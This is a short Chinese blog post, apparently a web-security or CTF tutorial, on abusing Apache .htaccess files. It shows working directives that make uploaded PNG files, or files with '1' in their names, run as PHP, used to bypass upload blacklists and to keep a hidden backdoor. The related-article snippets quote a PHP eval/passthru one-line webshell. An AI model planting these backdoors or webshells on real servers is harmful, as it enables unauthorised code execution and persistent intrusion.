.htaccess文件构成的PHP后门

最新推荐文章于 2024-06-02 08:54:02 发布
最新推荐文章于 2024-06-02 08:54:02 发布
阅读量2.8k 收藏 3
点赞数
分类专栏: # WEB基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/107005148
版权

1、.htaccess文件

2、文件上传绕过

一般.htaccess可以用来留后门和针对黑名单绕过

创建一个txt写入(png解析为php)

AddType application/x-httpd-php .png

另存为.htaccess

上传.htaccess 必须是网站根路径

3、留后门

可以在.htaccess 加入php解析规则

类似于把文件名包含1的解析成php

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

123456.png  就会以php执行

参考文章:

https://www.cnblogs.com/hmbb/p/9689436.html4

https://www.cnblogs.com/feizianquan/p/11109390.html

.htaccess文件的使用和解析方法(PHP
KkowServer的博客
10-09 741
参数”[L,R=301]"用于指定重写规则的标志,其中"L"表示该规则是最后一个规则,"R=301"表示使用301重定向。在上面的示例中,第一个规则将所有请求重定向到一个名为"maintenance.html"的页面,并返回302状态码(临时重定向)。上述示例中,第一个规则将所有请求重定向到名为"maintenance.html"的页面,使用302状态码(临时重定向)。第二个规则将"old-page"重定向到"new-page",使用301状态码(永久重定向)。
5.1. PHP
热门推荐
Sumarua的博客
07-05 1万+
内容索引:5.1. PHP5.1.1. 后门5.1.1.1. php.ini构成后门5.1.1.2. .user.ini文件构成PHP后门5.1.2. 反序列化5.1.2.1. PHP序列化实现5.1.2.2. PHP反序列化漏洞5.1.2.3. 相关CVE5.1.2.3.1. CVE-2016-71245.1.3. Disable Functions5.1.3.1. 机制实现5.1.3.2. Bypass5.1.4. Open Basedir5.1.4.1. 机制实现5.1.5. 安全相关配置5.1.
.htaccess做更隐蔽的后门
weixin_34269583的博客
05-21 227
作者:kindle From:http://key0.cn/?p=285 万恶的引用功能,下文复制粘贴无用,请自行将双引号修改 .htaccess内容如下 #首先允许web访问这个文件 <Files ~ “^\.ht”> Order allow,deny Allow from all </Files> RedirectMatch ...
.htaccess 后门
weixin_30512089的博客
08-11 322
<?php <Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php @eval($_GET[value]);?> # or <?php passthru($_GET['c...
.htaccess后门
weixin_30764883的博客
01-17 207
PHP手册,常看常新:) PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置. 恰好,找到两个邪恶的属性: auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path。 特殊值 none 禁止了自动前缀。 au...
小识.htaccess文件
aijie6150的博客
10-18 344
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1912
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2543
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
文件上传漏洞总结
最新发布
LiBai__的博客
06-02 1079
黑名单,顾名思义只要出现在名单之中的后缀,都不能上传成功,这就是黑名单的过滤方式。在upload-labs中以上便是一个常见的黑名单写法,下面是在用if语句来验证获得的文件后缀是否在数组里。这种过滤方式的弊端也很明显。如果过滤方式写的不严谨,内容不齐全。根据他的规则,只要没出现在黑名单中的后缀文件都可以上传成功。我们可以借助一些特殊的方式或者后缀。例如解析漏洞、特殊解析后缀php5(达成一些条件,也能解析成php文件)否则,只能利用一些特殊的绕过方法。例如%00截断,::$DATA。
CTF萌新入坑指南(web篇)(21.6.5已更新)
kingdring的博客
09-27 6146
ps:其实在写这篇入坑指南的时候内心还是十分挣扎的,毕竟大佬太多而我自己太太太太菜,然鹅我也不好拒绝温柔善良的郑童鞋的邀请,因此这篇文章只面向最最最新的萌新,各位大佬请自行忽略 前言 web在ctf里面占到的比重还是蛮大的,从国内有ctf赛事以来,web就一直是各 路出题人的宠儿,就比如说前段时间的某次分区赛初赛题目构成是7pwn 7web 1re 1misc,虽然在我看来这个题目分配过于偏激且离谱了,但是足以看出web 在ctf中的重要性,线下赛pwn佬可能更加关键,不过web手对于每个队伍都是
xss添加php后门,利用.Htaccess文件构成PHP后门
weixin_39611725的博客
03-18 391
0x00 .Htaccess简介.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。平时开发用的最多的就是URL重定向功能。0x01 开启.htaccessApache中修改配置文件httpd.conf修改如下内容Options F...
后门---php.ini/.htaccess/.user.ini-------------------利用 auto_prepend_file 和 include_path
bylfsj的博客
10-31 875
From:http://www.cnblogs.com/iamstudy/articles/php_ini_backdoor.html 原理 php.ini中有这几种模式: PHP_INI_*模式的定义 文件配置属性 官方解释 auto_prepend_file 意味这是在php脚本执行前会执行这个参数设置的脚本,然后这个参数的脚本所在目录...
渗透学习之PHP--后门
qq_62886656的博客
10-03 2014
渗透学习之php
.user.ini文件构成PHP后门
11-14 719
http://drops.wooyun.org/tips/3424 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastc...
phphtaccess,深入理解PHP.htaccess文件
weixin_33647940的博客
03-11 415
.htaccess文件提供了针对每个目录改变配置的方法。工作原理和使用方法.htaccess文件(或者"分布式配置文件")提供了针对每个目录改变配置的方法,即在一个特定的目录中放置一个包含指令的文件,其中的指令作用于此目录及其所有子目录。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配...
深究用户利用.htaccess的原理篡改配置导致的安全问题
蚁景网安学院
06-17 669
前言搞过ctf的师傅们大多都了解到,文件上传的时候经常使用.htaccess进行攻击;但是只了解那浅层的概念在很多时候是行不通的,比如下面这个题;我先把源码贴出来;借这个实例,深入理解....
htaccess application/x-httpd-php,htaccess AddHandler *** x-httpd-php5x ***和*** application / x-httpd...
weixin_32369749的博客
03-16 301
x-httpd-php5x和application / x-httpd-php5x之间有什么区别?我已经使用application / x-httpd-php多年来使用我的网络托管(Linux),直到他们将PHP升级到版本> = 5.2.现在我必须在web主机上使用x-httpd-php5x,这在localhost(Windows)上不起作用.因此,每当我对.htaccess进行一些更改时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值